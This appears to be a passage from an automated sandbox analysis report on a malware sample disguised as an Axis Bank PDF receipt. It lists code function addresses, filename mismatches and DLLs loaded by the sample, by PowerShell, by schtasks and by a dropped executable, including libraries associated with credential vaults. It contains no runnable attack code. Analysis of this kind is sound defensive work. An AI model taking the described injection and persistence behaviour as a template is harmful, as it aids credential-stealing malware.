Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035CF0E0 14_2_035CF0E0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035CF7B0 14_2_035CF7B0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03555630 14_2_03555630
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035C16CC 14_2_035C16CC
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035C7571 14_2_035C7571
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035D95C3 14_2_035D95C3
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035AD5B0 14_2_035AD5B0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03501460 14_2_03501460
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035CF43F 14_2_035CF43F
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035CFB76 14_2_035CFB76
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03585BF0 14_2_03585BF0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_0354DBF9 14_2_0354DBF9
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_0352FB80 14_2_0352FB80
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035CFA49 14_2_035CFA49
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035C7A46 14_2_035C7A46
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03583A6C 14_2_03583A6C
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035BDAC6 14_2_035BDAC6
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03555AA0 14_2_03555AA0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035ADAAC 14_2_035ADAAC
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035B1AA3 14_2_035B1AA3
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03519950 14_2_03519950
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_0352B950 14_2_0352B950
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035A5910 14_2_035A5910
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_0357D800 14_2_0357D800
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035138E0 14_2_035138E0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035CFF09 14_2_035CFF09
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_034D3FD5 14_2_034D3FD5
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_034D3FD2 14_2_034D3FD2
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03511F92 14_2_03511F92
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035CFFB1 14_2_035CFFB1
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03519EB0 14_2_03519EB0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035C1D5A 14_2_035C1D5A
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03513D40 14_2_03513D40
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035C7D73 14_2_035C7D73
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_0352FDC0 14_2_0352FDC0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03589C32 14_2_03589C32
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035CFCF2 14_2_035CFCF2
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_02B42E40 14_2_02B42E40
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_02B3C0A0 14_2_02B3C0A0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_02B3E020 14_2_02B3E020
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_02B445B0 14_2_02B445B0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_02B445AB 14_2_02B445AB
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_02B5AA70 14_2_02B5AA70
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_02B3DE00 14_2_02B3DE00
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_02B3DDF7 14_2_02B3DDF7
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: String function: 01AFEA12 appears 86 times
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: String function: 01B0F290 appears 105 times
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: String function: 01AC5130 appears 58 times
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: String function: 01AD7E54 appears 111 times
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: String function: 01A7B970 appears 280 times
Source: C:\Windows\SysWOW64\sc.exe Code function: String function: 0358F290 appears 105 times
Source: C:\Windows\SysWOW64\sc.exe Code function: String function: 034FB970 appears 280 times
Source: C:\Windows\SysWOW64\sc.exe Code function: String function: 0357EA12 appears 86 times
Source: C:\Windows\SysWOW64\sc.exe Code function: String function: 03545130 appears 58 times
Source: C:\Windows\SysWOW64\sc.exe Code function: String function: 03557E54 appears 111 times
Sample file is different than original file name gathered from version info
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, 00000000.00000002.2097492577.0000000006E30000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs Axis Bank - 67 Account Pending Bank Receipt.pdf.exe
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, 00000000.00000000.2049552997.00000000001E2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameUZhG.exe( vs Axis Bank - 67 Account Pending Bank Receipt.pdf.exe
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, 00000000.00000002.2072819144.000000000070E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Axis Bank - 67 Account Pending Bank Receipt.pdf.exe
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, 0000000A.00000002.2176817189.0000000001621000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesc.exej% vs Axis Bank - 67 Account Pending Bank Receipt.pdf.exe
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, 0000000A.00000002.2177359559.0000000001B7D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Axis Bank - 67 Account Pending Bank Receipt.pdf.exe
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, 0000000A.00000002.2176817189.00000000015F7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesc.exej% vs Axis Bank - 67 Account Pending Bank Receipt.pdf.exe
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Binary or memory string: OriginalFilenameUZhG.exe( vs Axis Bank - 67 Account Pending Bank Receipt.pdf.exe
Tries to load missing DLLs
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe Section loaded: rasadhlp.dll
Uses 32bit PE files
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
